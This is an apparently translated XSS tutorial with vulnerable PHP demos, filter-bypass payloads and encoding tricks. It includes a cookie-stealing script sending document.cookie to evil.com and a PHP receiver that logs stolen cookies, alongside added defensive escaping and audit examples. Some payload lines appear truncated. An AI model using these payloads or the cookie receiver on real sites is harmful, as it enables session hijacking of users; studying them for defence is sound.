Combining code to learn about the basics of XSS

Source: Internet
Author: User

Someone once said that XSS is so popular because every website, including Google's and Microsoft's, has had an XSS vulnerability at some point. Until now I had only understood this "juicy" topic superficially, without studying it systematically. I am using the summer vacation to analyze it systematically.

0x01 XSS Basics
    • Cross Site Scripting
    • Targets the web client
    • Comes from JS/ActiveX/Flash ...
JS XSS usage scenarios
    • Embedding HTML directly: <script>alert(/xss/);</script>
    • Element tag events: <body onload=alert(/xss/)>
    • Image tags:
    • Other tags: <iframe>, <div>, and <link>
    • DOM objects: tampering with page content
XSS can be divided into the following categories depending on how it takes effect:
    1. Reflected XSS
    2. Stored XSS
    3. DOM-based XSS, formed by modifying DOM nodes

Ease of exploitation: 2 > 3 > 1

Reflected XSS demo:

    <?php
    /** Reflected XSS demo */
    error_reporting(0);
    $text = $_GET['name'];
    ?>
    <input type="text" id="text" value="<?php echo $text ?>" />

Payload: ?name=">

Stored XSS demo:

    <?php
    /** Stored XSS demo */
    error_reporting(7);
    $name = $_GET['name'];
    $conn = mysql_connect("127.0.0.1", "root", "5688");
    mysql_select_db("test", $conn);
    mysql_query('set names "utf8"');
    // note: $name is also concatenated into the SQL string unescaped
    $sql_insert = "insert into liuyan(content) values('$name')";
    $result = mysql_query($sql_insert, $conn);
    $sql_select = "select * from liuyan";
    $results = mysql_fetch_array(mysql_query($sql_select));
    echo $results['content'];
    ?>

Step 1: ?name=<scRipt>Alert(1)</scrIpt>
Step 2: result

DOM-based XSS demo:

    <?php
    /** DOM-based XSS demo */
    error_reporting(0);
    $name = $_GET['name'];
    ?>
    <input id="text" type="text" value="<?php echo $name ?>" />
    <div id="print"></div>
    <script>
        var text = document.getElementById('text');
        var print = document.getElementById('print');
        print.innerHTML = text.value;   // untrusted value written as HTML
    </script>

Payload: ?name=
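The hardened counterpart of the reflected demo above, as an added example that is not from the original post. It is written in JavaScript rather than PHP so it runs stand-alone; renderInput(), escapeHtmlAttr() and isSingleInputTag() are hypothetical helper names.

```javascript
// Added example: output encoding for the HTML attribute context, the fix for
// value="<?php echo $text ?>" in the reflected demo. Not part of the original post.

const ATTR_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode the five characters that can close an attribute value or open a tag.
function escapeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ATTR_ESCAPES[c]);
}

// Mirrors the vulnerable PHP line: the raw value is pasted into the attribute.
function renderInputUnsafe(value) {
  return '<input type="text" id="text" value="' + value + '" />';
}

// Hardened form: the untrusted string can no longer close the quote or start a tag.
function renderInput(value) {
  return '<input type="text" id="text" value="' + escapeHtmlAttr(value) + '" />';
}

// Crude structural check: the rendered markup should contain exactly one tag
// (the <input> we wrote) and exactly the six quotes of its three attributes.
function isSingleInputTag(html) {
  const tags = (html.match(/</g) || []).length;
  const quotes = (html.match(/"/g) || []).length;
  return tags === 1 && quotes === 6;
}
```

The same rule applies to the DOM demo: writing `text.value` with `textContent` instead of `innerHTML` keeps it as data rather than markup.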
0x02 XSS Payload

After an XSS attack succeeds, the attacker can control the user's browser by implanting a malicious script into the page the user is currently viewing. These malicious scripts are known as the "XSS payload".

Cookie Hijacking
    http://www.a.com/test.php?abc="><script src=http://evil.com/evil.js></script>

evil.js content:

    var img = document.createElement("img");
    img.src = "http://www.evil.com/log?" + escape(document.cookie);
    document.body.appendChild(img);

PS: the log endpoint does not need to exist, because the request is recorded in the server's access log anyway.

This is the basic process of hijacking cookies with XSS. Once you have the user's cookie, how do you use it to log in to the server? There are a number of methods; two common ones are:

    • Burp Suite proxy: modify the Cookie header
    • Firefox plugin Tamper Data: intercept the request and modify the Cookie

PHP XSS cookie receiver

    <?php
    $cookie = $_GET['c'];
    $ip = getenv('REMOTE_ADDR');
    $time = date("j F, Y, g:i a");
    $referer = getenv('HTTP_REFERER');
    $fp = fopen('cookie.txt', 'a');
    fwrite($fp, 'Cookie: ' . $cookie . '<br/> IP: ' . $ip . '<br> Date and Time: ' . $time . '<br>Referer: ' . $referer . '<br><br>');
    fclose($fp);
    ?>

Save the above on your own server as 1.php, then write the XSS payload:

    <script>document.location="http://your server/1.php?c="+document.cookie;</script>

Other XSS payload techniques:
    • Constructing GET and POST requests
    • XSS phishing
    • Identifying the user's browser
    • Identifying software installed by the user
    • CSS history hack
    • Getting the user's real IP

0x03 XSS attack platforms
    • Attack API
    • BeEF
    • Xss-proxy
0x04 XSS worms

0x05 XSS construction tips

The most basic construction technique is "closing the tag": first close the tag or attribute the input lands in, then inject.

Using character encoding

The first point is the one the author of "White Hat Talks About Web Security" describes: when the page is encoded as GBK/GB2312, the "%c1\" trick bypasses the system's escaping, because the escaping backslash is absorbed into a multibyte character ...

Next come the various encodings:

URL encoding, Unicode encoding, HTML encoding

HTML encoding exists to keep code and display separate and avoid parse errors. Named entities have the form & followed by a name (for example the Greek letters); numeric character references are & # followed by a decimal number, or & # x followed by a hexadecimal number, giving an ASCII or Unicode code point. The browser first decodes the HTML entities and then renders. There is a premise, however: the encoding must be inside a "value", such as the src attribute's value; the attribute name src itself cannot be HTML-encoded, otherwise the browser will not render it properly.

    <img src=&#108;&#111;&#103;&#111;&#46;&#112;&#110;&#103; />
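Because the browser decodes character references before it interprets a src/href value, any server-side check of such a value has to decode first as well. The following is an added example, not from the original post; decodeHtmlEntities() and isSafeUrlValue() are hypothetical helpers that handle decimal, hexadecimal and a few common named entities, and the test inputs are constructed.

```javascript
// Added example: canonicalize HTML character references before validating a
// URL attribute value. Not part of the original post.

const NAMED = new Map([['amp', '&'], ['lt', '<'], ['gt', '>'], ['quot', '"'], ['apos', "'"], ['colon', ':']]);

// Decode &#108; (decimal), &#x6c; (hex) and the named entities in NAMED.
// Unknown names and out-of-range code points are left untouched.
function decodeHtmlEntities(s) {
  return String(s).replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (whole, body) => {
    const b = body.toLowerCase();
    let cp = null;
    if (b.startsWith('#x')) cp = parseInt(b.slice(2), 16);
    else if (b.startsWith('#')) cp = parseInt(b.slice(1), 10);
    else return NAMED.has(b) ? NAMED.get(b) : whole;
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
  });
}

// Accept relative paths and http(s) URLs; reject every other scheme.
// Leading/trailing controls and embedded tab/newline are stripped first,
// as URL parsers do, so they cannot hide the scheme.
function isSafeUrlValue(raw) {
  const decoded = decodeHtmlEntities(raw)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '')
    .toLowerCase();
  const scheme = /^([a-z][a-z0-9+.-]*):/.exec(decoded);
  if (!scheme) return true;                 // no scheme: relative URL such as logo.png
  return scheme[1] === 'http' || scheme[1] === 'https';
}
```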
CSS encoding

A backslash followed by 1 to 6 hexadecimal digits.

Common bypass methods

    <sCript>alert(1)</scRipt>
    <script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript>
    <scr<script>rip>alalertert</scr</script>rip>   (relies on the WAF's filtering being incomplete)
    <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>

Bypassing length limits

    <input type="text" value="$var" />
    length($var) <= 20

Method one: shorten the payload by using events

    " onclick=alert(1)//

Method two: use location.hash to load the XSS payload

Payload:

    " onclick="eval(location.hash.substr(1))

    <input type="text" value="" onclick="eval(location.hash.substr(1))" />

The first character of location.hash is #, so http://www.a.com/test.html#alert(1) triggers it. location.hash itself has no length limit, although the browser URL does; anything within that range works.

Method three: use comment characters to bypass the length limit

There are two input boxes; the first has a length limit and the second does not. A comment can join the part between the two boxes:

    input1#value: "><!--
    input2#value: --><script>alert(/xss/);</script>
Using the base tag

The role of the <base> tag in HTML is to provide the real base address for all links that use relative paths.

This can be exploited: if you can insert a base tag somewhere on the page and forge the corresponding image or script at that path on your own server, the page will load your payload in place of the intended resource.

    <base href="http://www.evil.com/" />
The magic of window.name

You can use this to achieve a cross-domain effect:

    In a.com:
        window.name = test
        location.href = "http://www.b.com/xss.php"
    In b.com, add:
        document.domain + window.name

and the crossing from a to b is easily achieved.
0x06 Some interesting attack tactics

Third-party hijacking (external JS/CSS)

Simply put: look at which external sites' JS/CSS/SWF your target site references, then compromise the corresponding external site and modify the JS/CSS/SWF to achieve the XSS effect; a "roundabout" penetration mode.

Here is a script, credited to "长短" (rendered "long short" in the source), that finds JS/CSS loaded from other sites:

    for (var i = 0, tags = document.querySelectorAll('iframe[src],frame[src],script[src],link[rel=stylesheet],object[data],embed[src]'), tag; tag = tags[i]; i++) {
        var a = document.createElement('a');
        a.href = tag.src || tag.href || tag.data;
        if (a.hostname != location.hostname) {
            console.warn(location.hostname + ' found third-party resource [' + tag.localName + ']: ' + a.href);
        }
    }

Just run this code in the browser console.
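A server-side version of the same inventory, as an added example that is not from the original post: it lists resources loaded from other hosts and additionally flags script and stylesheet tags without an integrity attribute, since Subresource Integrity is the standard mitigation for the third-party hijacking described above. findThirdPartyResources() is a hypothetical name, the HTML is constructed sample input and the hostnames are placeholders.

```javascript
// Added example: inventory third-party resources in an HTML document and report
// which script/link tags lack Subresource Integrity. Not part of the original post.

// Constructed sample page; hosts are placeholders, not real sites.
const SAMPLE_HTML = `
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<link rel="stylesheet" href="https://cdn.example.net/site.css" integrity="sha384-PLACEHOLDER" crossorigin="anonymous">
<iframe src="https://ads.example.org/frame"></iframe>
`;

// Returns one record per resource whose host differs from pageHost.
// sri is true/false for <script> and stylesheet <link>, null for tags SRI does not cover.
function findThirdPartyResources(html, pageHost) {
  const tagRe = /<(script|link|iframe|frame|object|embed)\b([^>]*)>/gi;
  const out = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attrs = m[2];
    // Mirror the console snippet: only stylesheet <link>s count.
    if (tag === 'link' && !/\brel\s*=\s*["']?stylesheet/i.test(attrs)) continue;
    const urlAttr = /\b(?:src|href|data)\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (!urlAttr) continue;
    let url;
    try { url = new URL(urlAttr[1], 'https://' + pageHost + '/'); } catch (e) { continue; }
    if (url.hostname === pageHost) continue;   // same-origin resource, not third-party
    const sriCapable = tag === 'script' || tag === 'link';
    const hasIntegrity = /\bintegrity\s*=/i.test(attrs);
    out.push({ tag, host: url.hostname, url: url.href, sri: sriCapable ? hasIntegrity : null });
  }
  return out;
}
```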

0x07 XSS in JavaScript development frameworks

jQuery

jQuery has an html() method: called without an argument it reads the innerHTML of a DOM node, and called with an argument it writes that argument into the node's innerHTML. This process can produce DOM-based XSS:

    $('div.demo-container').html("...");

In addition, some other frameworks, for example Dojo and YUI, have themselves had XSS vulnerabilities.

Https://www.ohlinge.cn/web/xss.html
